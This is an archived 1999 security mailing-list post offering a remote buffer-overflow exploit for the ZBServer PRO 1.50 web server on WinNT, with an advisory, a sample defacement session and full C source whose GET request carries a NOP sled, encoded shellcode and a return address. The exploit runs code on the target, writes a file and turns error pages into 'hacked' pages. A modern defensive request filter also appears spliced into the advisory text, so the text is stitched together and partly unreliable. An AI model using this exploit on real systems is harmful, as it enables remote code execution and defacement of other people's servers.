ZBServer 1.50-r1x exploit (WinNT)

From: |Zan (izanat_private)
Date: Thu Jan 28 1999 - 04:34:54 PST


    hi,
    
        A few weeks ago USSRBACK found a buffer overflow in ZBServer (GET
    command). Well, this is an exploit tested on WinNT 4.0 (Spanish version).
    It comes back with a raw EIP in the code (it does not jump through "call
    register" or "jmp register"). If you want a really portable exploit you
    can replace the last four bytes with a call edi + x where x > 10 bytes
    (I left a lot of NOPs waiting for that jump }:)
    
        I reversed the server too, and the exploit keeps ZBServer alive when
    it is exploited (it restores the registers and kills the overflowed
    thread), so pages are served out normally. The exploit writes an
    advisory file to disk with information for webmasters or administrators.
    It serves out hacked pages too, but it doesn't modify any server page
    (it patches the error messages in memory).
    
        A real advisory is attached. Excuse my poor English.
    
    Greets to:
    Jack Barnaby AKA Dark Spyrit   - http://www.beavuh.org
    USSRBACK - http://www.ussrback.com
    
    regards,
    |Zan
    
    --
    |Zan   /  DeepZone (tm) - Digital Security Center
    http://www.deepzone.org (not available yet, intranet only)
    http://mareasvivas.cjb.net
    
    --=[ ... a whole life looking for answers ... and when you finally
                   find them ... the questions change ]=--
    
    
                                 Studying ZBServer 1.50-r1x overflow
    
                  Advisory Name: ZBServer crash
              Advisory Released: [00/02/01]
                    Application: personal web, ftp and gopher servers
                                 on Win9x, WinNT
                       Severity: local/remote user with WebServer
                                 privileges can run arbitrary code.
                         Status: overflow discovered by USSRBACK
                                 http://www.ussrback.com
                         Author: izanat_private
                            WWW: http://www.deepzone.org
                                 http://mareasvivas.cjb.net
    
    
    
            OVERVIEW
            ZBServer PRO 1.50 (all releases) has a buffer overflow in the web
            server. Any local/remote user can run arbitrary code with web
            server privileges. The overflow was discovered by USSRBACK a few
            weeks ago. The original USSRBACK post didn't contain any technical
            detail. The present document is a deep study of that advisory.
            It studies the bug's impact too.
    
    
            BACKGROUND
            Ideas and code were tested against Win9x and NT 4.0 SP5 (all
            Spanish versions). The ZBServer PRO software is 1.50. All releases
            are affected (r13 to r17).
    
    
            DETAILS
            ZBServer PRO's WebServer has an overflow in the "get command". It
            can't handle an excessively long request. When the string has a
            length of about 766 bytes it crashes. The stack is overwritten.

            The vulnerability exists. USSRBACK's status (the bof discoverers)
            was originally:

            "Vendor Status: i email the vendor, and i dont have a responce :("

            We have exploited it and finished our exploit for WinNT; it's
            attached to this advisory. Arbitrary code can run with
            webserver privileges.

            The Win9x version can't be exploited with a clean environment. If
            you have a default debugger configuration or your processes are
            handled by a special process hooking errors and exceptions then
            it can be exploited too, but it won't be the common scenario.

            The Win9x version can't run arbitrary code with a clean environment
            but a DoS attack is possible. You can crash the service with a
            local/remote request.
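            A defender's counterpart to the crash condition above, added here as an example (it is not ZBServer's code, which this advisory does not show): a request-line check for a proxy or front end that refuses a GET before it reaches the server, either because the line is longer than an assumed 512-byte limit or because it carries non-printable bytes such as the 0x90 NOP sled the exploit string begins with. The limit, the function names and the sample requests are all constructed for this example.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical request-line guard, added as an example; not ZBServer code.
 * ZBServer crashes when the GET request string is about 766 bytes long, so
 * a filter in front of it can refuse such a line before the server ever
 * copies it.  The limit below is an assumed safe value, well under 766. */
#define MAX_REQUEST_LINE 512

enum req_verdict {
    REQ_OK = 0,
    REQ_TOO_LONG,       /* request line longer than MAX_REQUEST_LINE */
    REQ_BINARY,         /* byte outside printable ASCII: NOP sled or code */
    REQ_NO_TERMINATOR   /* no CR/LF yet within the limit: need more data */
};

/* Scan the first request line in buf (len bytes).  Stops at the first CR
 * or LF, so at most MAX_REQUEST_LINE + 1 bytes are examined whatever len is. */
enum req_verdict check_request_line(const unsigned char *buf, size_t len)
{
    size_t i;
    for (i = 0; i < len && i <= MAX_REQUEST_LINE; i++) {
        if (buf[i] == '\r' || buf[i] == '\n')
            return REQ_OK;
        if (buf[i] < 0x20 || buf[i] > 0x7e)
            return REQ_BINARY;
    }
    return i > MAX_REQUEST_LINE ? REQ_TOO_LONG : REQ_NO_TERMINATOR;
}

/* Constructed sample, not a capture of the exploit on this page: "GET /"
 * followed by 765 printable bytes, i.e. the same ~770-byte request length
 * the exploit sends but with no binary payload.  Length alone rejects it. */
enum req_verdict verdict_for_long_uri(void)
{
    unsigned char req[5 + 765 + 2];
    memcpy(req, "GET /", 5);
    memset(req + 5, 'A', 765);
    req[770] = '\r'; req[771] = '\n';
    return check_request_line(req, sizeof req);
}

/* Constructed sample: "GET /" followed by 0x90 (x86 NOP) bytes, the shape
 * of the exploit string cut short.  Content alone rejects it. */
enum req_verdict verdict_for_nop_sled(void)
{
    const unsigned char req[] = "GET /\x90\x90\x90\x90\r\n";
    return check_request_line(req, sizeof req - 1);
}
```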
    
    
            EXPLOIT
    
            The ZBServer PRO 1.50-r1x exploit gets full control of the remote
            server. When you attack a vulnerable server you can run arbitrary
            code inside it. Firstly, the sploit creates an advisory file. It's
            information for administrative use. Later, the exploit restores
            and kills the overflowed thread, but before that it patches some
            error information so all error pages will appear like hacked pages.

            If you have problems running ZBServer they may be with your return
            address (remember that tests ran against WinNT SP5 Spanish version).
            I could jump through the edi register + 5 (more portable) but I
            would have a static DLL address dependence. Well, it wasn't a clean
            jump, so I decided to implement the first technique, but the second
            is possible too.
    
            ex.
    
    
    
                % lynx http://xxx.xxx.xxx.xxx
    
                WELCOME TO ... blah ... blah ..... (It's the root page)
    
                % lynx xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html
    
                FILE NOT FOUND The request object (/ServerAbusedbyiZan.html) was
                not found.
    
                % lynx xxx.xxx.xxx.xxx/FileNotAvailable.html
    
                FILE NOT FOUND The request object (/FileNotAvailable.html) was not
                found.
    
                $ zbsploit xxx.xxx.xxx.xxx
    
                WinNT 4.0 sp5 ZBServer 1.50-r1x exploit http://mareasvivas.cjb.net -
                http://www.deepzone.org
    
                Coded by -=[|Zan]=- izanat_private - izanat_private
    
                done.
    
                $ lynx http://xxx.xxx.xxx.xxx
    
                WELCOME TO ... blah ... blah ..... (It's the root page again)
    
                % lynx http://xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html
    
                    Hello. You are running a ZBServer PRO's buggy version and
    
                                    you have been abused.
    
                            More information can be downloaded from
    
                        http://www.deepzone.org or http://mareasvivas.cjb.net
    
                     regards to DeepZone crew (TheWizard, ^Anuska^ and Nemo)
    
                                       Coded by |Zan.
    
    
    
                % lynx xxx.xxx.xxx.xxx/FileNotAvailable.html
    
                Server hacked.
    
                http://www.deepzone.org Sploit coded by |Zan
    
                %_
    
    
                     ................................................
    
    
    /** slzbserv.c - local/remote exploit for ZBServer PRO 1.50-r1x (WinNT)
     **
     ** The ZBServer PRO 1.50-r1x exploit gets full control of the remote
     ** server. When you attack a vulnerable server you can run arbitrary
     ** code inside it. Firstly, the sploit creates an advisory file. It's
     ** information for administrative use. Later, the exploit restores and
     ** kills the overflowed thread, but before that it patches some error
     ** information so all error pages will appear like hacked pages.
     **
     ** Compile on Debian with kernel 2.2.12: gcc -o  slzbserv slzbserv.c
     ** run: ./slzbserv hostname
     **
     ** http://mareasvivas.cjb.net / http://www.deepzone.org
     **
     ** Coded by |Zan | izanat_private
     **
     **/
    
    
    #include <stdio.h>
    #include <stdlib.h>      /* exit() */
    #include <string.h>      /* memcpy() */
    #include <unistd.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <sys/errno.h>
    #include <netdb.h>
    
    #define _PORT   80      /* ZBServer's web server port */
    #define _TamBuf 770     /* bytes of crash[] to send: the whole GET string, NUL excluded */
    
    char crash[] =
    "GET /"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10"
    "\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50"
    "\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18"
    "\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b"
    "\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9"
    "\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99"
    "\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9"
    "\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99"
    "\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02"
    "\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e"
    "\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65"
    "\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca"
    "\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5"
    "\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee"
    "\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9"
    "\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9"
    "\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed"
    "\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5"
    "\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc"
    "\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc"
    "\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed"
    "\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9"
    "\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9"
    "\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9"
    "\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9"
    "\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb"
    "\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7"
    "\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0"
    "\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7"
    "\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9"
    "\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7"
    "\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3"
    "\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7"
    "\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8"
    "\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7"
    "\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3"
    "\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7"
    "\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc"
    "\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc"
    "\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6"
    "\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc"
    "\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3"
    "\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\xac\xe0\xe3\x01";
    
    
    int     sock;
    struct  sockaddr_in sock_a;
    struct  hostent *host;
    
    int main (int argc, char *argv[]) {
    
     printf("\nWinNT 4.0 sp5 ZBServer PRO 1.50-r1x exploit\n");
     printf("http://mareasvivas.cjb.net - http://www.deepzone.org\n\n");
     printf("Coded by -=[ |Zan ]=-  izanat_private - izanat_private\n\n");
    
     if(argc < 2) {
       fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]);
       exit(1);
      }
    
     /* resolve the target and open a TCP connection to the web server port */
     if((host=gethostbyname(argv[1])) == NULL) {
        herror("gethostbyname");   /* gethostbyname() sets h_errno, not errno */
        exit(-1);
      }
    
     if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
        perror("create socket");
        exit(-1);
      }
    
     sock_a.sin_family=AF_INET;
     sock_a.sin_port=htons(_PORT);
     memcpy(&sock_a.sin_addr,host->h_addr,host->h_length);
     if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {
        perror("create connect");
        exit(-1);
      }
    
      fflush(stdout);
    
      /* send the 770-byte GET string (NOP sled, code and return address) and
         the blank line that ends the request; a short write is an error here */
      if(write(sock,crash,_TamBuf) != _TamBuf || write(sock,"\n\n", 2) != 2) {
        perror("write");
        exit(-1);
      }
      printf("done.\n\n");
    
      close(sock);
      return 0;
    }
    
    
    
    
    
    


